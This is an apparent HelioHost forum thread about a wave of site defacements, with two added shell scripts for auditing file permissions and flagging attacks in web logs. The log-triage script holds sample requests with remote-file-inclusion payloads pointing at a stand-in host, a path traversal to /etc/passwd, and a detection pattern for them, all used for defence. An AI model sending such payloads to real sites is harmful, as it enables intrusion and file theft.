[Solved] Account hacked?

NikeJoshua

djbob,

I very sincerely doubt that we were all running the same buggy software, as all that my site contained were my own designed PHP pages.

A note of interest is that right before the hack, the entire HelioHost server (including heliohost.org and helionet.org) was down with an Internal Server Error and a Cannot Connect to Server error, which, along with the fact that several seemingly unrelated accounts were hacked and that some of the links were non-public ones (one of mine isn't shared publicly, pooras' was still in maintenance), does lead me to believe the attack was on the server as a whole.

 

For me the sites don't contain any sensitive data, so I really don't mind if this never gets resolved; I can just reupload the correct page each time they change it and be done with it. However, this may not be the case for others, and could seriously hurt the reputation of HelioHost...


djbob,

You asked about what we were using? I was using WordPress 3.0.1 (it's the latest version), and that means I was using PHP like the other hacked sites.

As NikeJoshua said and I said before too, it seems the attack was on the whole server and not on a site for a specific reason. I didn't tell anybody about my site and, as I told you, it was still in maintenance and at the very beginning, so there was not anything special on my site to give the hackers a reason to attack!

I deleted my whole set of files on the server, so I can not tell you to check my files, but I don't know if they logged in to my cPanel or not. I wish you could have found out how they attacked. Did they use an exploit on WP or PHP or what?


If the attack was on the whole server then I think we'd be in more trouble than we are. HelioHost and HelioNet are still okay.

My new theory: the attack targeted anybody whose "chmod" permissions were set incorrectly. Using CGI scripts you can easily access files anywhere on the hard drive, and if they have permissions to play around with them (i.e. you set them to 777) then they can delete stuff. Same goes for a directory with 777 - files can be created in it.

alteisen: the files you have there were chown'd by root. I deleted them. They were symlinked to the system's zone files, which is sort of useless considering that information is publicly broadcast over our nameservers...


Looks like my site was hacked, too: http://windswept.heliohost.org/ Should I try to fix this now, or let you take a look and see what they did first?

I don't have anything installed on the site, it's all my own stuff. And I don't -think- I set anything to 777. Might've been some problems with HTML not being properly escaped, though. I figured since it was just a test site and all of 5 people knew about it, it wouldn't be a problem, so I kinda hadn't gotten around to fixing that yet. >.>

*Edit to add. And for some reason I can't access Google, or Yahoo, or forumcircle, and a whole bunch of sites right now. But I can access a few sites (like this one), so my internet isn't broken. Could this possibly be related, or is it just a coincidence? That was fine just a couple hours ago. I'm on Ubuntu Linux.

> Looks like my site was hacked, too: http://windswept.heliohost.org/ Should I try to fix this now, or let you take a look and see what they did first?
>
> I don't have anything installed on the site, it's all my own stuff. And I don't -think- I set anything to 777. Might've been some problems with HTML not being properly escaped, though. I figured since it was just a test site and all of 5 people knew about it, it wouldn't be a problem, so I kinda hadn't gotten around to fixing that yet. >.>
>
> *Edit to add. And for some reason I can't access Google, or Yahoo, or forumcircle, and a whole bunch of sites right now. But I can access a few sites (like this one), so my internet isn't broken. Could this possibly be related, or is it just a coincidence? That was fine just a couple hours ago. I'm on Ubuntu Linux.

Try OpenDNS to fix your internet.


Thanks, that worked. I was worried for a bit that those Iranian guys had done more than just mess up my website. Good to know it was just my ISP's nameservers screwing up and my computer's OK. :)

Hm... Looks like they screwed up the index.cgi page and added an index.html page. *Deletes them* I -think- everything else has been left alone.


djbob,

The chmod theory is wrong as well:

All files are set: -rw-r--r-- (644)

Directories: drwxr-xr-x (755)

Also, it seems they have some sort of script running that periodically keeps reuploading their version of index.php after I replace it with mine.

In any event, my site is REALLY basic; it is just 2 small PHP files (one 9k, the other 19k). Perhaps it could help if you would check those for vulnerabilities?

For this I'll give you whatever permission you may need to access my files in any way you see fit. If you prefer I email you the PHP source files or something, let me know.

I think this would be the quickest way to either point out the security flaw, or show that the cause is server related (it would definitely be easier than going over all the server files...).

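The two posts above argue over whether world-writable (777) files and directories explain the defacements, one by theory and one by listing 644/755 modes by hand. The check below is an added example, not code from the thread or from HelioHost: a small POSIX shell script that lists every world-writable file or directory under a web root (the path is assumed to be passed as the first argument, for instance public_html) and can tighten them to the 644/755 values quoted in the thread. Symlinks are skipped on purpose, because on Linux a symlink itself always reports mode 777 and would produce false positives.

```shell
#!/bin/sh
# Audit a web root for world-writable entries (the "set to 777" condition
# discussed in the thread) and optionally tighten them.
# Example added here; the web root path is an assumed argument.

# Print every regular file or directory whose "other" write bit is set.
# -perm -0002 = "at least the o+w bit"; the type filter excludes symlinks,
# which would otherwise match because a symlink's own mode is 0777.
audit_world_writable() {
    root="$1"
    find "$root" -perm -0002 \( -type f -o -type d \) 2>/dev/null | sort
}

# Number of world-writable entries, as a bare integer (useful in scripts).
count_world_writable() {
    audit_world_writable "$1" | wc -l | tr -d ' '
}

# Tighten only the offending entries: directories to 755, files to 644.
# Entries that are already correct are left untouched.
fix_world_writable() {
    root="$1"
    find "$root" -type d -perm -0002 -exec chmod 755 {} +
    find "$root" -type f -perm -0002 -exec chmod 644 {} +
}

# Stand-alone usage: ./audit.sh ~/public_html
if [ -n "$1" ]; then
    echo "World-writable entries under $1:"
    audit_world_writable "$1"
    echo "Total: $(count_world_writable "$1")"
fi
```

Run the audit first and read the list before calling fix_world_writable, since an upload directory that a PHP script writes into may legitimately need group or owner write access (but almost never world write).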

Mine got hacked too. I was using some recent version of Drupal (really just an experiment site, so I don't remember which version). I hadn't logged in for days/weeks/months/don't remember, so I highly doubt they'd intercepted a session. Sounds like they would be targeting heliohost.org?

I did set an image folder to 777. Really not sure about CGI scripting so I can't comment.


I set up my account a week or two ago. It was totally fresh, apart from a single index.html file containing the text "hello world." No php stuff. Chmod is 644.

It was hacked, I deleted it, it was hacked again yesterday. Hopefully the vulnerability won't be too difficult to track down.


Guys,

I suggest you check your latest visitor stats; maybe you will find out which part of your PHP programs is vulnerable to shell injection. My site has been injected so many times, and from the latest visitor stats I can see where the script is injected; then I put that visitor IP into the ban list.


> Guys,
>
> I suggest you check your latest visitor stats; maybe you will find out which part of your PHP programs is vulnerable to shell injection. My site has been injected so many times, and from the latest visitor stats I can see where the script is injected; then I put that visitor IP into the ban list.

What IP did you end up banning?

>> Guys,
>>
>> I suggest you check your latest visitor stats; maybe you will find out which part of your PHP programs is vulnerable to shell injection. My site has been injected so many times, and from the latest visitor stats I can see where the script is injected; then I put that visitor IP into the ban list.
>
> What IP did you end up banning?

The latest one is 41.102.66.14. I forgot the rest because I can't access my cPanel at the moment.
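The advice in this exchange is to read the visitor log, find which script the injection requests hit, and ban the source address. The script below is an added example, not code from the thread or from HelioHost, showing one way to do that over Apache-style access log lines with only grep and awk. The five log lines are constructed for the example (addresses come from the documentation ranges, not from the thread), and the patterns it flags are the common signs of a remote-file-inclusion or path-traversal attempt against a PHP page: a query parameter whose value is a URL, a "../" sequence, or an embedded NUL (%00).

```shell
#!/bin/sh
# Triage Apache/cPanel access-log lines: flag requests that look like
# file-inclusion or traversal attempts, then count them per client IP and
# per targeted script so you know which address to ban and which PHP file
# to inspect. Example added here; the log lines are constructed.

SAMPLE_LOG='203.0.113.5 - - [10/Oct/2010:13:55:36 +0000] "GET /index.php?page=about HTTP/1.1" 200 2326
203.0.113.5 - - [10/Oct/2010:13:55:40 +0000] "GET /index.php?page=http://198.51.100.7/x.txt HTTP/1.1" 200 512
198.51.100.9 - - [10/Oct/2010:13:56:01 +0000] "GET /index.php?page=../../../../etc/passwd HTTP/1.1" 200 512
192.0.2.44 - - [10/Oct/2010:13:57:12 +0000] "GET /about.php HTTP/1.1" 200 1834
203.0.113.5 - - [10/Oct/2010:13:58:03 +0000] "POST /upload.php?f=ftp://198.51.100.7/sh.txt HTTP/1.1" 200 88'

# Read log lines on stdin; print "ip request-target" for each line whose
# request target contains a parameter pointing at a URL, a "../" sequence,
# or a %00 byte. $1 is the client IP, $7 the request target in common log
# format ("GET /path?query HTTP/1.1" splits into fields 6, 7 and 8).
suspicious_requests() {
    grep -E '"(GET|POST) [^ ]*(=https?://|=ftp://|\.\./|%00)' | awk '{print $1, $7}'
}

# Count flagged requests per client IP, busiest first: "ip count".
suspicious_ips() {
    suspicious_requests | awk '{print $1}' | sort | uniq -c | sort -rn \
        | awk '{print $2, $1}'
}

# Count flagged requests per script path (part before "?"), busiest first:
# this is the file whose input handling needs to be reviewed.
targeted_scripts() {
    suspicious_requests | awk '{split($2, p, "?"); print p[1]}' \
        | sort | uniq -c | sort -rn | awk '{print $2, $1}'
}

# Stand-alone usage: run against the constructed sample, or pipe a real
# log in with:  suspicious_ips < ~/access-logs/example.com
if [ -z "$1" ] && [ -t 0 ]; then
    echo "Flagged requests:"
    printf '%s\n' "$SAMPLE_LOG" | suspicious_requests
    echo "Per IP:"
    printf '%s\n' "$SAMPLE_LOG" | suspicious_ips
    echo "Per script:"
    printf '%s\n' "$SAMPLE_LOG" | targeted_scripts
fi
```

The per-script count is the part the thread's advice really depends on: banning one IP stops one source, but the script that accepted a URL or "../" in its page parameter is what lets the next address in, so that file is where the fix (validating the parameter against an allow-list of page names) belongs.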

This topic is now closed to further replies.